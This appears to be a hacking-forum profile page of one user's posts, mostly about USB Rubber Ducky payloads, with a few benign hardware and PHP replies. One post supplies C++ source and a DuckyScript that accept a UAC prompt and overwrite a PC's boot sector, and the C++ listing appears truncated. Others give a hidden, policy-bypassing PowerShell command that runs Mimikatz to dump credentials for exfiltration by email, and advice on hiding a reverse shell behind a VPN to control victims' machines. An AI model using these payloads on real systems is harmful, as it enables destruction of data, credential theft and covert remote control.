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Posts posted by ThoughtfulDev

  1. How about using Domain Fronting?

    10 hours ago, Hackerman said:

    Thanks for your replies!

    Reverse shell anonymity sounds pretty complicated, so is there another way to take control of victims machine that could be more anonymous than reverse shell? For example is it possible to set victims machine as “server” and then connect to it through tor or VPN? Does anyone have any idea?

    You can connect your C&C Server to a VPN with port forwarding and then let the shell connec to that port on the vpn side which will then be forwarded to your C&C... in theory.

  2. be quiet! Silent Base 800 Black, No Window
    ASUS Prime X370-Pro
    AMD Ryzen 7 1700X
    2x8GB Vengeance DDR4-3200
    be quiet! Silent Loop 120mm
    MSI GTX 770
    Samsung 850 Evo 250GB SSD
    550 Watt Corsair Semi Modular PSU (dont know the actual name rn)

    Wanted to buy a new GPU for Machine Learning but prices are so damn high...

    • Like 1
  3. 13 hours ago, Dave-ee Jones said:


    You could generate a random number and do a switch of some kind?

    if __NUMBER__ is 1:
    	Q STRING "IT'S 1!"
    else if __NUMBER__ is 2:
    	Q STRING "Oh boi. It's 2."

    Down further in that page it actually gives an example of throwing a dice.

    that would be possible if he were using a BashBunny haha :) since the ducky is only a HID this wont work directly on the ducky.

  4. As far as i know the ducky cant do that on it self. maybe you can write a bash/batch script to copy a random key/number into your clipboard and start that and the ducky just presses CTRL+V to copy that random character?

  5. 1 hour ago, i8igmac said:

    I was thinking a chromebook with intel chip. I don't see any one talking about them here.


    my wife has one with a intel chip. I have been itching to fire up linux. I have read its hardware works out of the box.


    They are cheap.


    The toucch sccreen might perform well with gnome shell3 and will give it a greate tablet style user interface...


    Long battery life.

    The intel ones do work with e.g Gallium OS(which is ubuntu + the necessary chromebook drivers). (use it myself)

  6. Credits: https://github.com/brainsmoke/nyanmbr (he wrote a freaking bootloader with nyancat.. AMAZING)

    I made a payload to overwrite your bootloader with the nyancat bootloader which will render your PC USELESS.

    CAUTION: This will brick your bootloader. DO NOT TRY THIS on your OWN PC USE A VM

    1. Download the precompiled boot.exe (source code is here if you want to compile yourself):

    #include <windows.h>
    #include <conio.h>
    #include <iostream>
    int main(int argc, char* argv[]){
    	DWORD dw;
    	char *pathToBin = "boot.bin";
    	HANDLE drive = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
    	if (drive != INVALID_HANDLE_VALUE){
    		HANDLE binary = CreateFile(pathToBin, GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
    		if (binary != INVALID_HANDLE_VALUE){
    			DWORD size = GetFileSize(binary, 0);
    			if (size > 0){
    				byte *mbr = new byte[size];
    				if (ReadFile(binary, mbr, size, &dw, 0)){
    					std::cout << "Binary file successfuly read!" << std::endl;
    					if (WriteFile(drive, mbr, size, &dw, 0)){
    						std::cout << "First sector overritten successfuly!" << std::endl;
    						std::cerr << "Fatal error! Can't override 1st sector!" << std::endl;
    					std::cerr << "Error reading from binary file!" << std::endl;
    				std::cerr << "Invalid binary file!" << std::endl;
    			std::cerr << "Can't find the binary file to read from!" << std::endl;
    		std::cerr << "Administrator privileges required!" << std::endl;
        return 0;

    2. Create Folder exec on your ducky sdcard and copy boot.exe into it.

    3. Download the img file from https://github.com/brainsmoke/nyanmbr and rename it to boot.bin and put it in DUCKY\exec\boot.bin

    4. Here is the duckyscript( make sure your sdcard is labeld: DUCKY):

    REM I am NOT responsible for ANY DAMAGE
    REM overwrites bootloader with https://github.com/brainsmoke/nyanmbr
    DELAY 5000
    DELAY 500
    DELAY 500
    STRING cmd
    DELAY 500
    DELAY 1000
    REM replace with desired uac alt + key kombo (y for yes in english , j for german etc)
    ALT y
    DELAY 1500
    STRING for /f %a in ('wmic logicaldisk get volumename^,name ^| find "DUCKY"') do %a
    DELAY 300
    STRING cd exec
    DELAY 300
    STRING boot.exe
    DELAY 1000
    STRING exit


    I have also added this payload to my PyDuckGen (https://github.com/ThoughtfulDev/PyDuckGen) which makes generating payloads easier



  7. Are you sure that php is enabled in your apache or IIS webserver?

    try to place a php file e.g test.php in the webdirectory root with the following content:


    if you now visit yourwebserver/test.php you should see a table with some information if php is enabled.


    I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz

    REM -------------------------------------------------------------------------------------
    REM Get drive letter of drive with label DUCKY
    REM -------------------------------------------------------------------------------------
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
    DELAY 500
    REM -------------------------------------------------------------------------------------
    REM Copy and execute Invoke Mimikatz
    REM -------------------------------------------------------------------------------------
    STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"

    Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.

  8. Use something like:

    Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt';

    this writes the output of Invoke-Mimikatz to your temp folder in a file name yourpcname_creds.txt which you can then read and or even send as a email attachment if you want.

    ps: the invoke mimikatz script isn't hosted on darrens webserver - use your own host.

  9. 10 hours ago, Willhall996 said:

    Can anyone tell me what other files, if any, are on the memory card with the inject.bin file. lost the original card and also if it has to be formatted in any specific manor? 

    FAT32. and no only the inject.bin since this was just the hello world payload. as already said use the java encoder to encode your raw txt payload into the inject.bin

  10. On 9.6.2017 at 5:38 PM, ItsKorma (YT) said:

    I need help im new to this, i just got usb rubber ducky. its bit hard for me to get around it at the moment, but what you just said is what im looking for i want to be able to view victim screen or control it, able to look at the files etc. Please help me step by step. 

    Sounds like you need a Basic Metasploit payload (dont worry about the stealth /undetected part for now). Have a look at Metasploit Minute for Tutorials about Metasploit.

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